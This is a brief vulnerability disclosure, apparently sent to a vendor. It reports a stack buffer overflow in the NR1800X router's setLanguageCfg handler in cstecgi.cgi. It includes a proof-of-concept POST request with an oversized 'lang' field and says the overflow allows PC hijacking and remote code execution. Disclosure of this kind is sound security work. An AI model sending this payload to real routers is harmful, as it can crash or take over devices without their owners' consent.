Hi, we found a post-authentication stack buffer overflow at **NR1800X (**Firmware version V9.3.5u.6369_B20220309), and contact you at the first time.
The bug is in function setLanguageCfg of the file /cgi-bin/cstecgi.cgi which can control lang to attack. The size of lang is not checked, and directly copy to stack via sprintf (at line 17)
PoC
POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.17.220 User-Agent: python-requests/2.18.4 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive Cookie: Cookie=uid=1234 Content-Length: 5 Content-Type: application/x-www-form-urlencoded
{"topicurl": "setLanguageCfg", "lang" : "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}
The PC register can be hijacked, which means it can result in RCE.